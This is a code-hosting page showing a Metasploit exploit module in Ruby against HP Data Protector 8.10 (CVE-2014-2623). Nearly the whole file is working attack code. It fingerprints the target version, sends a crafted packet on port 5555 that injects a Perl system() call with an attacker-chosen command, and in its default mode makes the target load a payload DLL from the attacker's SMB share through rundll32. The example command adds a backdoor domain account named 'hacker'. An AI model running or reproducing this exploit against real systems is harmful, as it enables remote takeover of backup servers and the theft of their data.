adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ea08fc076713f144dd3c4f0cbd7a0da414e6d348
metasploit-gs/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
T
Matthew Hall 60edda4ff1 add hp data protector exploit
2014-12-09 14:12:37 +00:00

157 lines
4.5 KiB
Ruby
Raw Blame History

This file contains invisible Unicode characters
This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMBFileServer
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
A remote command execution is triggered when a crafted command is sent to the Hp Data Protector Manager on TCP Port 5555.
},
'Author' => [
'Christian (Polunchis) Ramirez https://intrusionlabs.org', # POC
'Henoch (Chanoc) Barrera       https://intrusionlabs.org', # POC
'Matthew Hall <hallm@sec-1.com>' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2014-2623' ],
[ 'URL', 'http://www.exploit-db.com/exploits/34066/'], # POC
[ 'URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
[ 'URL', 'http://www.sec-1.com/blog/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2014'))
register_options(
[
Opt::RPORT(5555),
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
],
self.class)
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 11
return Exploit::CheckCode::Appears
elsif minor == 12
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end
end
def start_server
vprint_status("Generating our malicious dll...")
exe = generate_payload_dll
@exe_file = rand_text_alpha(7) + ".dll"
@share = rand_text_alpha(5)
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
@unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
vprint_status("About to start SMB Server on: " + @unc)
# start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
start_smb_server(@unc, exe, @exe_file)
end
def peer
"#{rhost}:#{rport}"
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
def exec_bar(cmd)
connect
cmd = cmd.gsub("\\", "\\\\\\\\")
vprint_status("Sending Command: #{cmd}")
cmd_no = target['Offset'] + cmd.length
vprint_status("Size is #{cmd_no}")
pkt = "\x00\x00\x00"
pkt << cmd_no
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
pkt << "('#{cmd}')" # Executable
pkt << "\x00"
sock.put(pkt)
# In my testing the default timeout (10) isn't enough
if datastore['CMD']
begin
res = sock.get_once(-1, 20)
rescue EOFError
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
else
handler
disconnect
end
end
def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
end
def exploit
if datastore['CMD']
print_status("Executing command #{datastore['CMD']}")
exec_bar(datastore['CMD'])
else
start_server
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{@unc}")
sploit = "rundll32.exe #{@unc},"
sploit << rand_text_numeric(1)
exec_bar(sploit)
end
end
end
Reference in New Issue View Git Blame Copy Permalink